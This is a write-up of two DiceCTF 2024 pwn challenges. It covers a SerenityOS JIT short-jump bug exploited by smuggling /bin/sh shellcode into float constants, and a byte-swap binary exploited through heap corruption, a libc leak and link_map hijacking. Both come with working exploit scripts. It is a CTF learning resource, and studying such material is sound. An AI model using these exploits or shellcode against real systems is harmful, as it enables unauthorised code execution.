Contents

DiceCTF 2024 Quals

https://i.imgur.com/llysqqr.png
DiceCTF 2024 Quals. We secured the first place

I played with the Blue Water team in the DiceCTF 2024 Quals. We managed to secure the first place. A huge shoutout and thanks to my awesome teammates for their fantastic teamwork during it!

Below is the writeup for the pwn challenges that I managed to solve.

Pwn

hop

Description

Using 32 bits to encode a short jump is so wasteful… this will surely be better🐞🤓

nc mc.ax 32421

Initial Analysis

In this challenge, we were provided with a zip file containing the Dockerfile used to build the challenge, along with a patch file. Below is the content of the patch file.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
Base: https://github.com/SerenityOS/serenity/tree/fbde901614368dcf03d4a8eee800d8b89131465f

diff --git a/Userland/Libraries/LibJIT/X86_64/Assembler.h b/Userland/Libraries/LibJIT/X86_64/Assembler.h
index 79b96cf81f..465c4cb38c 100644
--- a/Userland/Libraries/LibJIT/X86_64/Assembler.h
+++ b/Userland/Libraries/LibJIT/X86_64/Assembler.h
@@ -472,12 +472,23 @@ struct X86_64Assembler {
     private:
         void link_jump(X86_64Assembler& assembler, size_t offset_in_instruction_stream)
         {
-            auto offset = offset_of_label_in_instruction_stream.value() - offset_in_instruction_stream;
+            auto offset = static_cast<ssize_t>(offset_of_label_in_instruction_stream.value() - offset_in_instruction_stream);
             auto jump_slot = offset_in_instruction_stream - 4;
-            assembler.m_output[jump_slot + 0] = (offset >> 0) & 0xff;
-            assembler.m_output[jump_slot + 1] = (offset >> 8) & 0xff;
-            assembler.m_output[jump_slot + 2] = (offset >> 16) & 0xff;
-            assembler.m_output[jump_slot + 3] = (offset >> 24) & 0xff;
+            if (offset <= INT8_MAX && offset >= INT8_MIN && assembler.m_output[jump_slot - 1] == 0xE9) {
+                auto small_offset = static_cast<int8_t>(offset + 3);
+                // JMP rel8
+                assembler.m_output[jump_slot - 1] = 0xEB;
+                assembler.m_output[jump_slot + 0] = small_offset;
+                // NOP3_OVERRIDE_NOP
+                assembler.m_output[jump_slot + 1] = 0x0F;
+                assembler.m_output[jump_slot + 2] = 0x1F;
+                assembler.m_output[jump_slot + 3] = 0x00;
+            } else {
+                assembler.m_output[jump_slot + 0] = (offset >> 0) & 0xff;
+                assembler.m_output[jump_slot + 1] = (offset >> 8) & 0xff;
+                assembler.m_output[jump_slot + 2] = (offset >> 16) & 0xff;
+                assembler.m_output[jump_slot + 3] = (offset >> 24) & 0xff;
+            }
         }
     };

The patch targets the JIT (Just-In-Time compilation) code of LibJS in SerenityOS. Examining the patch reveals a significant bug. The intention behind the patch is to replace a 5-byte near jump (JMP rel32, opcode 0xE9) with a 2-byte short jump (JMP rel8, opcode 0xEB) followed by a 3-byte NOP whenever the offset fits in a signed byte. However, an issue arises in how small_offset is calculated. Because the short jump ends 3 bytes earlier than the original instruction, the patch adds 3 to the offset, but the range check is performed on offset rather than on offset + 3. If offset + 3 exceeds INT8_MAX (that is, when offset is 125, 126, or 127), the cast to int8_t wraps around and produces a negative displacement. Consequently, the JIT-compiled code behaves incorrectly: instead of jumping forward to the intended destination, it jumps backward to a preceding address, disrupting the intended flow of execution.

Solution

Based on the bug we identified, let’s start by setting up our local environment. The first step involves cloning the SerenityOS repository and applying the patch.

1
2
3
4
git clone https://github.com/SerenityOS/serenity/
cd serenity
git checkout fbde901614368dcf03d4a8eee800d8b89131465f
git apply ../patch

Before proceeding to build the js engine, a small adjustment will simplify our debugging process. Navigate to the serenity/Userland/Libraries/LibJS/JIT/Compiler.cpp file and modify the DUMP_JIT_DISASSEMBLY value to 1. This adjustment ensures that whenever we execute JavaScript code using the js engine that triggers JIT compilation, the engine will automatically dump the disassembly of the JIT-compiled code. With this setting enabled, we are now ready to proceed with building the js engine.

1
./Meta/serenity.sh build lagom js

First, we’ll begin by crafting a simple script to examine the JIT-compiled code’s behavior.

1
2
3
4
5
6
7
8
function test() {
    if (1 === 1) {
        return 41414141
    }
    return [42424242];
}
for (let i = 0; i < 0x1000; i++) {test();}
console.log("Hello World");
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
Block 2:
2:0 LoadImmediate undefined:
0x00007fc11cc5c266  48 b8 00 00 00 00 00  mov    rax, 0x7ffe000000000000
0x00007fc11cc5c26d  00 fe 7f
0x00007fc11cc5c270  49 89 c4              mov    r12,rax
2:20 LoadImmediate 41414141:
0x00007fc11cc5c273  48 b8 fd ed 77 02 00  mov    rax, 0x7ffa00000277edfd
0x00007fc11cc5c27a  00 fa 7f
0x00007fc11cc5c27d  49 89 c4              mov    r12,rax
2:40 Return:
0x00007fc11cc5c280  4c 89 e0              mov    rax,r12
0x00007fc11cc5c283  48 89 43 20           mov    [rbx+0x20],rax
0x00007fc11cc5c287  eb 47                 jmp    short 1cc5c2d0 <common_exit>
0x00007fc11cc5c289  0f 1f 00              nop    [rax]

Block 3:
3:0 LoadImmediate undefined:
0x00007fc11cc5c28c  48 b8 00 00 00 00 00  mov    rax, 0x7ffe000000000000
0x00007fc11cc5c293  00 fe 7f
0x00007fc11cc5c296  49 89 c4              mov    r12,rax
3:20 Jump @4:
0x00007fc11cc5c299  eb 03                 jmp    short 1cc5c29e <Block 4>
0x00007fc11cc5c29b  0f 1f 00              nop    [rax]

Block 4:
4:0 NewPrimitiveArray [ 42424242 ]:
0x00007fc11cc5c29e  48 be 48 2c 81 b6 5f  mov    rsi, 0x0000555fb6812c48
0x00007fc11cc5c2a5  55 00 00
0x00007fc11cc5c2a8  ba 01 00 00 00        mov    edx, 0x00000001
0x00007fc11cc5c2ad  57                    push   rdi
0x00007fc11cc5c2ae  6a 00                 push   0x00
0x00007fc11cc5c2b0  48 b8 d0 37 0a 1d c1  mov    rax, 0x00007fc11d0a37d0
0x00007fc11cc5c2b7  7f 00 00
0x00007fc11cc5c2ba  ff d0                 call   eax
0x00007fc11cc5c2bc  48 83 c4 08           add    rsp,0x08
0x00007fc11cc5c2c0  5f                    pop    rdi
0x00007fc11cc5c2c1  49 89 c4              mov    r12,rax
4:20 Return:
0x00007fc11cc5c2c4  4c 89 e0              mov    rax,r12
0x00007fc11cc5c2c7  48 89 43 20           mov    [rbx+0x20],rax
0x00007fc11cc5c2cb  eb 03                 jmp    short 1cc5c2d0 <common_exit>
0x00007fc11cc5c2cd  0f 1f 00              nop    [rax]
common_exit:
0x00007fc11cc5c2d0  4c 89 23              mov    [rbx],r12
0x00007fc11cc5c2d3  41 5f                 pop    r15
0x00007fc11cc5c2d5  41 5e                 pop    r14
0x00007fc11cc5c2d7  41 5d                 pop    r13
0x00007fc11cc5c2d9  41 5c                 pop    r12
0x00007fc11cc5c2db  5b                    pop    rbx
0x00007fc11cc5c2dc  5b                    pop    rbx
0x00007fc11cc5c2dd  c9                    leave
0x00007fc11cc5c2de  c3                    ret

Upon analyzing the dumped results, we notice that each return statement triggers a relative JMP instruction to common_exit, which the patch then converts into a jmp short. Observing the disassembly, our goal becomes clear: to extend the jmp short offset when returning 41414141. The presence of return [42424242] in the JIT-compiled code, as mentioned above, indicates that to enlarge the jmp short offset for returning 41414141, we can simply incorporate multiple values to be returned in that line. For instance, altering the script as follows increases the offset.

1
2
3
4
5
6
7
8
function test() {
    if (1 === 1) {
        return 41414141
    }
    return [42424242], 43434343;
}
for (let i = 0; i < 0x1000; i++) {test();}
console.log("Hello World");
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
Block 2:
2:0 LoadImmediate undefined:
0x00007f4c10fac266  48 b8 00 00 00 00 00  mov    rax, 0x7ffe000000000000
0x00007f4c10fac26d  00 fe 7f
0x00007f4c10fac270  49 89 c4              mov    r12,rax
2:20 LoadImmediate 41414141:
0x00007f4c10fac273  48 b8 fd ed 77 02 00  mov    rax, 0x7ffa00000277edfd
0x00007f4c10fac27a  00 fa 7f
0x00007f4c10fac27d  49 89 c4              mov    r12,rax
2:40 Return:
0x00007f4c10fac280  4c 89 e0              mov    rax,r12
0x00007f4c10fac283  48 89 43 20           mov    [rbx+0x20],rax
0x00007f4c10fac287  eb 54                 jmp    short 10fac2dd <common_exit> <- TARGET
0x00007f4c10fac289  0f 1f 00              nop    [rax]

Block 3:
3:0 LoadImmediate undefined:
0x00007f4c10fac28c  48 b8 00 00 00 00 00  mov    rax, 0x7ffe000000000000
0x00007f4c10fac293  00 fe 7f
0x00007f4c10fac296  49 89 c4              mov    r12,rax
3:20 Jump @4:
0x00007f4c10fac299  eb 03                 jmp    short 10fac29e <Block 4>
0x00007f4c10fac29b  0f 1f 00              nop    [rax]

Block 4:
4:0 NewPrimitiveArray [ 42424242 ]:
0x00007f4c10fac29e  48 be 68 0c ff e2 da  mov    rsi, 0x000055dae2ff0c68
0x00007f4c10fac2a5  55 00 00
0x00007f4c10fac2a8  ba 01 00 00 00        mov    edx, 0x00000001
0x00007f4c10fac2ad  57                    push   rdi
0x00007f4c10fac2ae  6a 00                 push   0x00
0x00007f4c10fac2b0  48 b8 d0 37 6a 11 4c  mov    rax, 0x00007f4c116a37d0
0x00007f4c10fac2b7  7f 00 00
0x00007f4c10fac2ba  ff d0                 call   eax
0x00007f4c10fac2bc  48 83 c4 08           add    rsp,0x08
0x00007f4c10fac2c0  5f                    pop    rdi
0x00007f4c10fac2c1  49 89 c4              mov    r12,rax
4:20 LoadImmediate 43434343:
0x00007f4c10fac2c4  48 b8 67 c1 96 02 00  mov    rax, 0x7ffa00000296c167
0x00007f4c10fac2cb  00 fa 7f
0x00007f4c10fac2ce  49 89 c4              mov    r12,rax
4:40 Return:
0x00007f4c10fac2d1  4c 89 e0              mov    rax,r12
0x00007f4c10fac2d4  48 89 43 20           mov    [rbx+0x20],rax
0x00007f4c10fac2d8  eb 03                 jmp    short 10fac2dd <common_exit>
0x00007f4c10fac2da  0f 1f 00              nop    [rax]
common_exit:
0x00007f4c10fac2dd  4c 89 23              mov    [rbx],r12
0x00007f4c10fac2e0  41 5f                 pop    r15
0x00007f4c10fac2e2  41 5e                 pop    r14
0x00007f4c10fac2e4  41 5d                 pop    r13
0x00007f4c10fac2e6  41 5c                 pop    r12
0x00007f4c10fac2e8  5b                    pop    rbx
0x00007f4c10fac2e9  5b                    pop    rbx
0x00007f4c10fac2ea  c9                    leave
0x00007f4c10fac2eb  c3                    ret

The offset grows by 0xd (from 0x47 to 0x54) when one more constant is added to the return expression, which suggests a way to steer the jump distance and trigger the bug. By experimenting with various patterns, I discovered a specific code snippet that successfully triggers the bug.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
function test() {
    if (1 === 1) {
        if (2 === 3) {
            return 0, 1, 2, 3, 4, 5;
        };
    }
    return [4141414141];
}
for (let i = 0; i < 0x1000; i++) {test();}
console.log("Hello World");

Here is the disassembly following our adjustments:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
Block 4:
4:0 NewPrimitiveArray [ 4141414141 ]:
0x00007f52f0c364c6  48 be b8 51 dc c4 e5  mov    rsi, 0x000055e5c4dc51b8
0x00007f52f0c364cd  55 00 00
0x00007f52f0c364d0  ba 01 00 00 00        mov    edx, 0x00000001
0x00007f52f0c364d5  57                    push   rdi
0x00007f52f0c364d6  6a 00                 push   0x00
0x00007f52f0c364d8  48 b8 d0 37 4a f1 52  mov    rax, 0x00007f52f14a37d0
0x00007f52f0c364df  7f 00 00
0x00007f52f0c364e2  ff d0                 call   eax
0x00007f52f0c364e4  48 83 c4 08           add    rsp,0x08
0x00007f52f0c364e8  5f                    pop    rdi
0x00007f52f0c364e9  49 89 c4              mov    r12,rax
4:20 Return:
0x00007f52f0c364ec  4c 89 e0              mov    rax,r12
0x00007f52f0c364ef  48 89 43 20           mov    [rbx+0x20],rax
0x00007f52f0c364f3  eb 81                 jmp    short f0c36476 <2:a0+0x31>
0x00007f52f0c364f5  0f 1f 00              nop    [rax]

Block 5:
5:0 LoadImmediate undefined:
0x00007f52f0c364f8  48 b8 00 00 00 00 00  mov    rax, 0x7ffe000000000000
0x00007f52f0c364ff  00 fe 7f
0x00007f52f0c36502  49 89 c4              mov    r12,rax
5:20 LoadImmediate 0:
0x00007f52f0c36505  48 b8 00 00 00 00 00  mov    rax, 0x7ffa000000000000
0x00007f52f0c3650c  00 fa 7f
0x00007f52f0c3650f  49 89 c4              mov    r12,rax
5:40 LoadImmediate 1:
0x00007f52f0c36512  48 b8 01 00 00 00 00  mov    rax, 0x7ffa000000000001
0x00007f52f0c36519  00 fa 7f
0x00007f52f0c3651c  49 89 c4              mov    r12,rax
5:60 LoadImmediate 2:
0x00007f52f0c3651f  48 b8 02 00 00 00 00  mov    rax, 0x7ffa000000000002
0x00007f52f0c36526  00 fa 7f
0x00007f52f0c36529  49 89 c4              mov    r12,rax
5:80 LoadImmediate 3:
0x00007f52f0c3652c  48 b8 03 00 00 00 00  mov    rax, 0x7ffa000000000003
0x00007f52f0c36533  00 fa 7f
0x00007f52f0c36536  49 89 c4              mov    r12,rax
5:a0 LoadImmediate 4:
0x00007f52f0c36539  48 b8 04 00 00 00 00  mov    rax, 0x7ffa000000000004
0x00007f52f0c36540  00 fa 7f
0x00007f52f0c36543  49 89 c4              mov    r12,rax
5:c0 LoadImmediate 5:
0x00007f52f0c36546  48 b8 05 00 00 00 00  mov    rax, 0x7ffa000000000005
0x00007f52f0c3654d  00 fa 7f
0x00007f52f0c36550  49 89 c4              mov    r12,rax
5:e0 Return:
0x00007f52f0c36553  4c 89 e0              mov    rax,r12
0x00007f52f0c36556  48 89 43 20           mov    [rbx+0x20],rax
0x00007f52f0c3655a  eb 1a                 jmp    short f0c36576 <common_exit>
0x00007f52f0c3655c  0f 1f 00              nop    [rax]

Block 6:
6:0 LoadImmediate undefined:
0x00007f52f0c3655f  48 b8 00 00 00 00 00  mov    rax, 0x7ffe000000000000
0x00007f52f0c36566  00 fe 7f
0x00007f52f0c36569  49 89 c4              mov    r12,rax
6:20 Jump @7:
0x00007f52f0c3656c  eb 03                 jmp    short f0c36571 <Block 7>
0x00007f52f0c3656e  0f 1f 00              nop    [rax]

Block 7:
7:0 Jump @4:
0x00007f52f0c36571  e9 50 ff ff ff        jmp    f0c364c6 <Block 4>
common_exit:
0x00007f52f0c36576  4c 89 23              mov    [rbx],r12
0x00007f52f0c36579  41 5f                 pop    r15
0x00007f52f0c3657b  41 5e                 pop    r14
0x00007f52f0c3657d  41 5d                 pop    r13
0x00007f52f0c3657f  41 5c                 pop    r12
0x00007f52f0c36581  5b                    pop    rbx
0x00007f52f0c36582  5b                    pop    rbx
0x00007f52f0c36583  c9                    leave
0x00007f52f0c36584  c3                    ret

Upon closer examination, we observe that when returning [4141414141], the jmp short instruction becomes corrupted: it is encoded as eb 81, i.e. a rel8 displacement of 0x81 (-127). This causes the instruction to jump backward instead of forward to common_exit. The objective now shifts to adjusting our POC so that the corrupted jmp rel8 lands on bytes of the JIT-compiled code that we control. The following JavaScript code achieves this by placing the jump destination inside an immediate value that we supply.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
function test() {
    if (1 === 3) {
        if (2 === 3) {
            return 0, 1, 2, 3, 4, 5;
        };
    }
    return 2261634.5098039214 ,2261634.5098039214,{},[4444],[5555];
}
for (let i = 0; i < 0x1000; i++) {test();}
console.log("Hello World")
 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
Block 4:
4:0 LoadImmediate 2261634.5098039214:
0x00007f7617c494c6  48 b8 41 41 41 41 41  mov    rax, 0x4141414141414141
0x00007f7617c494cd  41 41 41
0x00007f7617c494d0  49 89 c4              mov    r12,rax
...
...
...
4:98 Return:
0x00007f47048d8543  4c 89 e0              mov    rax,r12
0x00007f47048d8546  48 89 43 20           mov    [rbx+0x20],rax
0x00007f47048d854a  eb 81                 jmp    short 48d84cd <Block 4+0x7>
0x00007f47048d854c  0f 1f 00              nop    [rax]

Notably, <Block 4+0x7> falls under our control, as it lies inside the 8-byte immediate that encodes our floating-point value (2261634.5098039214, whose raw bytes are 0x4141414141414141). This means we can smuggle shellcode into the JIT-compiled code: by making the return statement include additional floating-point values whose raw bytes are our shellcode, we effectively insert executable code into the JIT output.

What I did here involves smuggling shellcode by appending additional values to the return statement. Specifically, within the <Block 4+0x7>, I did another backward jump that directs execution to the previously smuggled shellcode. For the creation of this smuggled shellcode, I used the script detailed below:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
# Taken from https://ctftime.org/writeup/29915
#
# Generates the JavaScript `return ...;` statement whose floating-point
# literals, once JIT-compiled into `mov rax, imm64` instructions, carry the
# shellcode below inside their 8-byte immediates.
from pwn import *
import struct
context.arch = "amd64"

# Shellcode: builds the string "/bin/sh\0" in rbx, pushes it on the stack and
# issues syscall 0x3b with rdi = rsp and rsi = rdx = 0.
instructions = [
"mov ebx, 0x0068732f",
"shl rbx, 32",
"mov edx, 0x6e69622f",
"add rbx, rdx",
"push rbx",
"xor eax, eax",
"mov al, 0x3b",
"mov rdi, rsp",
"xor edx, edx",
"xor rsi, rsi",
"syscall"
]

# Pack the assembled instructions into 8-byte chunks: at most 6 bytes of
# payload (NOP-padded) followed by a 2-byte `jmp $+7` that hops to the next
# chunk. In the JIT output shown in the writeup each immediate is followed by
# a 3-byte `mov r12,rax` and the 2-byte opcode of the next `mov rax, imm64`,
# so +7 from the start of the jmp lands on the next immediate.
buf = [b""]
bytecode = [asm(i) for i in instructions]
jmp = asm("jmp $+7")
for i in bytecode:
    if len(buf[-1] + i) > 6:
        buf[-1] = buf[-1].ljust(6, b"\x90") + jmp
        buf.append(i)
    else:
        buf[-1] += i
# Last chunk needs no trailing jmp; pad to 7 bytes and end with 0x41 so the
# most significant byte keeps the sign bit clear (the double stays positive).
buf[-1] = buf[-1].ljust(7, b"\x90")+b'\x41'

# Debug output: each instruction next to its encoding.
for i,v in zip(instructions, bytecode):
    print(i, v)

# Reinterpret every 8-byte chunk as a double and append it to the statement.
return_statement = 'return '
for i, n in enumerate(buf):
    if len(n) > 8:
        # A chunk longer than 8 bytes cannot be unpacked as a single double.
        print(f"ERROR: CHUNK {i} TOO LONG")
        print(disasm(n))
        exit()
    f = struct.unpack("d", n)[0]
    return_statement += f'{f}, '

# Trampoline constant: 5 filler bytes, then a backward jmp, then 1 filler byte.
# The distance uses 13 bytes per LoadImmediate (10-byte `mov rax, imm64` plus
# 3-byte `mov r12,rax`).
# NOTE(review): the extra -7 and -11 terms presumably account for the position
# of the jmp inside its immediate and the instruction lengths — confirm.
jmp_backward = struct.unpack("d", b'aaaaa'+asm(f"jmp ${-7-13*(len(buf)-1)-11}")+b'a')[0]
return_statement += f'{jmp_backward}, ' # another backward jump to the start of our smuggled shellcode
return_statement += '2261634.5098039214,{},[4444],[5555];' # padding
print(return_statement)

Following the shellcode generation, we just need to put the generated return statement to our previous POC:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
function test() {
    if (1 === 3) {
        if (2 === 3) {
            return 0, 1, 2, 3, 4, 5;
        };
    }
    return 3.7960572222424763e-280, 3.7963592540881645e-280, 3.796288397419065e-280, 3.8219835402295355e-280, 3.7965429435410983e-280, 3.7965737440041074e-280, 69477412.1406443, 1.7387995134439084e+162, 2261634.5098039214,{},[4444],[5555];
}
for (let i = 0; i < 0x1000; i++) {test();}
console.log("Hello World")

We just need to send the above script to the remote server using the script below, and we will get a shell!

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
from pwn import *

# Connect to the challenge service.
r = remote('mc.ax', 32421)

# Load the exploit script; the context manager closes the file handle
# instead of leaving it open for the rest of the interactive session.
with open('./example.js', 'rb') as f:
    poc = f.readlines()

# Wait for the prompt that ends with 'EOF' (presumably the terminator the
# service expects — confirm against the remote banner), then send the script
# line by line followed by the terminator itself.
r.recvuntil(b"'EOF'")
for line in poc:
    r.sendline(line.strip())
r.sendline(b'EOF')
r.interactive()

I got second blood in this challenge :)

Flag: dice{hop_skip_shortjmp}

boogie-woogie

Description

i’ve been watching too much jjk due to super bruteforce, we are forced to add POW. this is why we can’t have nice things

nc mc.ax 31040

Initial Analysis

For this challenge, we were presented with a binary named boogie-woogie. The initial step involved examining the binary’s mitigations.

1
2
3
4
5
6
╰─❯ checksec boogie-woogie
    Arch:     amd64-64-little
    RELRO:    Full RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

All protections were found to be active. Now, it’s time to check the disassembly of the important functions: main

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
/*
 * Entry point (decompiler output).
 * Prints two banner strings, then loops for as long as data[0] is non-zero.
 * Each iteration prints data as a string, prints the prompt, reads two
 * values with scanf("%zu %zu") and passes them to clap().
 * Returns 0 once data[0] becomes zero.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
  __int64 v4; // [rsp+8h] [rbp-18h] BYREF
  __int64 v5; // [rsp+10h] [rbp-10h] BYREF
  unsigned __int64 v6; // [rsp+18h] [rbp-8h]

  v6 = __readfsqword(0x28u); // presumably the stack-canary load — confirm in the disassembly
  puts(_art);
  puts(s);
  while ( data[0] )
  {
    // Only v5 is reset here; v4 is never initialised or reset by this function.
    v5 = 0LL;
    printf("\n\x1B[31;49;1;4m%s\x1B[0m\n\n\n", data);
    puts(
      "The sound of \x1B[0;33mgion shoja bells\x1B[0m echoes the impermanence of all things. The color\n"
      "of \x1B[0;33msala flowers\x1B[0m reveals the truth that the prosperous must decline. \x1B[4;33mHowever\x1B[0m! We\n"
      "are the exception:");
    // The scanf return value is ignored, and both values are forwarded to
    // clap() without any range check.
    __isoc99_scanf("%zu %zu", &v4, &v5);
    clap(v4, v5);
  }
  return 0;
}

clap

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
/*
 * Swaps data[a1] and data[a2] with the three-step XOR swap (decompiler output).
 * Neither index is bounds-checked in this function.
 * Returns a pointer to data[a1].
 *
 * Note: when a1 == a2 both operands refer to the same element, so the first
 * XOR sets it to 0 and it stays 0 — the element is zeroed, not preserved.
 */
char *__fastcall clap(__int64 a1, __int64 a2)
{
  char *result; // rax

  data[a1] ^= data[a2]; // data[a1] = x ^ y
  data[a2] ^= data[a1]; // data[a2] = y ^ (x ^ y) = x
  result = &data[a1];
  data[a1] ^= data[a2]; // data[a1] = (x ^ y) ^ x = y
  return result;
}

The binary’s structure is straightforward. Essentially, it allows for the swapping of bytes within any rw (read-write) area of the binary, specifically relative to the bss section (where data is stored). This byte-swapping capability is the sole interaction allowed, and the program terminates if the value at data[0] is set to NULL.

Solution

Despite the binary’s simplicity, crafting an exploit poses a significant challenge.

Brute-force heap offset

Initially, we can leak any value if we know its offset relative to the data, by exchanging the target_offset with 0x96. The value 0x96 represents the final byte in the data string, indicating that swapping and moving our target value to data[0x96] will result in its display on the prompt.

The primary challenge arises from the fact that the bss area lacks valuable information for leakage, except for the PIE base address. This limitation prompts the exploration of alternative strategies, such as attempting to brute-force the heap offset. Notably, if a viable offset within the heap can be identified, it becomes feasible to trace back to the heap’s top chunk, and we can do more with it later on.

Is brute-forcing the heap offset a feasible strategy? Indeed, it is. Typically, the heap spans an area of 0x21000 bytes. Observations indicate that the gap between the bss and heap areas ranges from approximately 0x0XXY000 to 0x1XXY000. Because the heap's default size exceeds 0x10000, once the XX part is guessed correctly, any value of the Y nibble lands inside the heap, which reduces the brute-force effort to roughly 8 bits. This makes the brute-force approach quite practical.

Leak libc address

Let's say that we are able to brute-force the heap offset and identify the top chunk; the next question is: what possibilities does this open up? A close examination of the heap chunks in gdb reveals the default layout.

1
2
3
4
Chunk(addr = 0x555555564000 , size=0x290, flags=PREV_INUSE)
Chunk(addr = 0x555555564290 , size=0x410, flags=PREV_INUSE)
Chunk(addr = 0x5555555646a0 , size=0x410, flags=PREV_INUSE)
Chunk(addr = 0x555555564ab0 , size=0x20550, flags=PREV_INUSE)  <-  top

Unfortunately, it does not contain any directly useful values for leakage. However, an intriguing opportunity arises with the potential to corrupt the top chunk size.

Now, consider the scenario where the top chunk size is altered from 0x20550 to merely 0x550 with the swap. It’s observed that triggering a malloc(0x800) call is straightforward via scanf, especially by prefixing our inputted number with numerous leading zeros. What implications would this manipulation have when combined with a malloc(0x800) call triggered by scanf?

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
--- BEFORE SCANF (CORRUPTED TOP CHUNK)
gef> heap chunks
Chunk(addr = 0x555555564000 , size=0x290, flags=PREV_INUSE)
Chunk(addr = 0x555555564290 , size=0x410, flags=PREV_INUSE)
Chunk(addr = 0x5555555646a0 , size=0x410, flags=PREV_INUSE)
Chunk(addr = 0x555555564ab0 , size=0x550, flags=PREV_INUSE)  <-  top

--- AFTER SCANF
gef> heap chunks
Chunk(addr = 0x555555564000 , size=0x290, flags=PREV_INUSE)
Chunk(addr = 0x555555564290 , size=0x410, flags=PREV_INUSE)
Chunk(addr = 0x5555555646a0 , size=0x410, flags=PREV_INUSE)
Chunk(addr = 0x555555564ab0 , size=0x530, flags=PREV_INUSE, fd=0x7ffff7e1ace0, bk=0x7ffff7e1ace0)  <-  unsortedbins[1/1]
Chunk(addr = 0x555555564fe0 , size=0x10, flags=)
Chunk(addr = 0x555555564ff0 , size=0x10, flags=PREV_INUSE)

Upon inspecting the heap’s state in gdb following our manipulation, we observe the presence of an unsorted bin chunk. This opens the door to leaking a libc address. Having the libc address leads to several exploitation pathways.

In our approach, we opted for the link_map exploitation technique, as detailed in nobodyisnobody’s article. To effectively trigger the code outlined in glibc’s dl-fini.c, a series of steps are required:

  • Nullify link_map->l_info[DT_FINI_ARRAY].
  • Overwrite link_map->l_info[DT_FINI] with an address we control, allowing us to modify the d_un.d_ptr value subsequently.
  • Adjust link_map->l_addr and link_map->l_info[DT_FINI]->d_un.d_ptr so the sum of their values will point to our desired function address.
  • Trigger exit.

Exploring the possibilities with one_gadget, we identified one good gadget.

1
2
3
4
5
0xebc85 execve("/bin/sh", r10, rdx)
constraints:
  address rbp-0x78 is writable
  [r10] == NULL || r10 == NULL
  [rdx] == NULL || rdx == NULL

The next step involves placing the one_gadget address into the link_map. However, it’s important to remember that our ability to write is constrained to swapping bytes. Given this limitation, how can we insert the one_gadget address into the link_map?

A reliable method involves leaking the stack address, then positioning our targeted bytes on the stack through scanf, followed by swapping them into place. However, we discovered this trick quite late in the process and had already secured the flag using our initial approach, which we will outline here.

The one_gadget address consists of 6 bytes, and the higher 3 bytes can be easily written by sourcing them from the libc GOT area. We simply select any libc address present there whose higher 3 bytes match those of our chosen one_gadget across multiple runs.

The 1st lower byte of the one_gadget address is consistently 0x85. Upon examining the memory, we discovered a value within the ld rw area that invariably contains the 0x85 byte.

Regarding the 2nd lower byte of the one_gadget, it is influenced by ASLR. Nonetheless, a thorough memory scan revealed a value in the ld rw area that consistently matches the 2nd lower byte of the one_gadget address across multiple executions.

Unfortunately, for the 3rd lower byte, there is no address that consistently mirrors the one_gadget’s 3rd lower byte. Therefore, we relied on luck :), scanning the ld memory with the swap function in each run, hoping to find a byte in the ld area that could match the 3rd lower byte.

Brute-forcing the heap offset took quite some time, and even when we hit it, we sometimes failed to find the 3rd byte in the ld area before the timeout. However, we eventually hit it once and were able to fetch the flag. Below is our full script with detailed comments:

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
from pwn import *

# Filter ld area to be scanned. Skip addresses that always
# contains zero bytes. `out` file example
'''
0x7ff7628f0000:	0x0000000000039e80	0x0000000000000000
0x7ff7628f0010:	0x0000000000000000	0x00007ff7627fda10
0x7ff7628f0020 <_dl_signal_exception@got.plt>:	0x00007ff7627fd960	0x00007ff7627fd9b0
0x7ff7628f0030 <_dl_catch_error@got.plt>:	0x00007ff7627fdb30	0x0000000000000000
0x7ff7628f0040 <_rtld_global>:	0x00007ff7628f12e0	0x0000000000000004
0x7ff7628f0050 <_rtld_global+16>:	0x00007ff7628f15a0	0x0000000000000000
...
'''
lines = open('out', 'rb').readlines()
ld_rw_base = 0x00007ff7628f0000
map_offset = {}
rev_map = {}
for line in lines:
